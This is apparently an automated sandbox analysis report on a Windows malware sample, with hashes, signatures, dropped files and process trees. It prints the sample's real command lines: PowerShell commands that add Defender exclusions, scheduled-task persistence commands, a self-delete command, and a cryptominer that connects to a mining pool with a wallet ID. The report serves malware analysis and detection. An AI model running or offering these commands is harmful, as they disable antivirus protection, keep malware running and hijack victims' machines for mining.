Analysis
max time kernel: 1s
max time network: 121s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 22/12/2023, 13:51
Static task: static1
  1 signatures
Behavioral task: behavioral1
  Sample: af9721f9690603beffdb08ccb2b8196a.exe
  Resource: win7-20231215-en
  7 signatures
  150 seconds
Behavioral task: behavioral2
  Sample: af9721f9690603beffdb08ccb2b8196a.exe
  Resource: win10v2004-20231215-en
  3 signatures
  150 seconds
General
Target: af9721f9690603beffdb08ccb2b8196a.exe
Size: 12.9MB
MD5: af9721f9690603beffdb08ccb2b8196a
SHA1: f2531c0a5d3b3670c369c1b56c3d48ce9983cb46
SHA256: 05346140fbd935a2bd11cdb627178453624d5c2556ce5d253bd1a35095eaf0c9
SHA512: 8d7ce747f31e51fd218fe3faa5831a25de14f7df63b541938c8490f85d0f62800e0e2fb6190587bb20b23cbe3c70cd268f1ac133c3e79c3adf2d7da9582345c8
SSDEEP: 393216:5BIVza8DRgTzJDmTcdUHWM2Yk/6MgkkZqL:LSJRgPJ8cdUvkyMZL
Score: 7/10
Malware Config
Signatures

Executes dropped EXE (1 IoCs)
  pid   Process
  3024  Ycyjrvvzmiodfe.exe

Loads dropped DLL (1 IoCs)
  pid   Process
  2508  choice.exe

resource  yara_rule
  behavioral1/memory/2704-106-0x0000000140000000-0x0000000141B3D000-memory.dmp  vmprotect
  behavioral1/memory/3004-153-0x0000000140000000-0x0000000141B3D000-memory.dmp  vmprotect
  behavioral1/memory/2704-145-0x0000000140000000-0x0000000141B3D000-memory.dmp  vmprotect
  behavioral1/memory/3004-157-0x0000000140000000-0x0000000141B3D000-memory.dmp  vmprotect
  behavioral1/memory/2704-89-0x0000000140000000-0x0000000141B3D000-memory.dmp   vmprotect
  behavioral1/memory/952-171-0x0000000140000000-0x0000000141B3D000-memory.dmp   vmprotect
  behavioral1/memory/952-176-0x0000000140000000-0x0000000141B3D000-memory.dmp   vmprotect
  behavioral1/memory/1656-256-0x0000000140000000-0x0000000141B3D000-memory.dmp  vmprotect

Drops file in Windows directory (13 IoCs)
  description                  ioc                                              Process
  File created                 C:\Windows\Winteste.bat                          Ycyjrvvzmiodfe.exe
  File created                 C:\Windows\__tmp_rar_sfx_access_check_259395092  Ycyjrvvzmiodfe.exe
  File created                 C:\Windows\WNDR.bat                              Ycyjrvvzmiodfe.exe
  File opened for modification C:\Windows\WindowsUpdaters.vbs                   Ycyjrvvzmiodfe.exe
  File opened for modification C:\Windows\Windows.exe                           Ycyjrvvzmiodfe.exe
  File created                 C:\Windows\WindowsNote.exe                       Ycyjrvvzmiodfe.exe
  File opened for modification C:\Windows\WindowsNote.exe                       Ycyjrvvzmiodfe.exe
  File opened for modification C:\Windows\WNDR.bat                              Ycyjrvvzmiodfe.exe
  File created                 C:\Windows\winserver.xml                         Ycyjrvvzmiodfe.exe
  File created                 C:\Windows\Windows.exe                           Ycyjrvvzmiodfe.exe
  File opened for modification C:\Windows\Winteste.bat                          Ycyjrvvzmiodfe.exe
  File created                 C:\Windows\WindowsUpdaters.vbs                   Ycyjrvvzmiodfe.exe
  File opened for modification C:\Windows\winserver.xml                         Ycyjrvvzmiodfe.exe

Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  3056  schtasks.exe
  1768  schtasks.exe

Runs net.exe

Suspicious use of WriteProcessMemory (4 IoCs)
  description                       pid   Process     procid_target
  PID 2508 wrote to memory of 3024  2508  choice.exe  46
  PID 2508 wrote to memory of 3024  2508  choice.exe  46
  PID 2508 wrote to memory of 3024  2508  choice.exe  46
  PID 2508 wrote to memory of 3024  2508  choice.exe  46
Processes
(depth 1 entries are flush left; depth 2 entries are indented under them)

C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe"
  PID: 2508

    C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe"
      Signatures: Executes dropped EXE; Drops file in Windows directory
      PID: 3024

C:\Windows\SysWOW64\net1.exe
  Command line: C:\Windows\system32\net1 FILE
  PID: 2680

C:\Windows\system32\cmd.exe
  Command line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
  PID: 3048

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
      PID: 2128

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      PID: 1944

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
      PID: 1096

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      PID: 2368

C:\Windows\Windows.exe
  Command line: Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 0
  PID: 3004

C:\Windows\Windows.exe
  Command line: Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0
  PID: 2704

    C:\Windows\Windows.exe
      Command line: Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 1
      PID: 952

    C:\Windows\Windows.exe
      Command line: Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 2
      PID: 1656

    C:\Windows\Windows.exe
      Command line: Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 3
      PID: 2604

    C:\Windows\Windows.exe
      Command line: Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 4
      PID: 976

    C:\Windows\Windows.exe
      Command line: Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 5
      PID: 1940

    C:\Windows\Windows.exe
      Command line: Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 6
      PID: 1704

    C:\Windows\Windows.exe
      Command line: Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 7
      PID: 2848

    C:\Windows\Windows.exe
      Command line: Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 8
      PID: 2324

    C:\Windows\Windows.exe
      Command line: Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 9
      PID: 3060

    C:\Windows\Windows.exe
      Command line: Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 10
      PID: 1892

    C:\Windows\Windows.exe
      Command line: Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 11
      PID: 1248

C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
  PID: 312

    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
      PID: 1732

C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /Create /XML C:\Windows\winserver.xml /tn winserver
  Signatures: Creates scheduled task(s)
  PID: 3056

C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c ""C:\Windows\WNDR.bat" "
  PID: 2648

C:\Windows\SysWOW64\net.exe
  Command line: NET FILE
  PID: 2644

C:\Windows\WindowsNote.exe
  Command line: "C:\Windows\WindowsNote.exe"
  PID: 2788

C:\Windows\SysWOW64\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Windows\WindowsUpdaters.vbs"
  PID: 2748

C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c ""C:\Windows\Winteste.bat" "
  PID: 2840

C:\Users\Admin\AppData\Local\Temp\svchost64.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
  PID: 784

    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
      PID: 2424

    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
      PID: 2512

    C:\Windows\system32\services64.exe
      Command line: "C:\Windows\system32\services64.exe"
      PID: 1608

C:\Windows\system32\schtasks.exe
  Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
  Signatures: Creates scheduled task(s)
  PID: 1768

C:\Windows\system32\cmd.exe
  Command line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
  PID: 2520

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
      PID: 2708

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      PID: 2872

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      PID: 2672

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
      PID: 1248

C:\Windows\system32\choice.exe
  Command line: choice /C Y /N /D Y /T 3
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  PID: 2508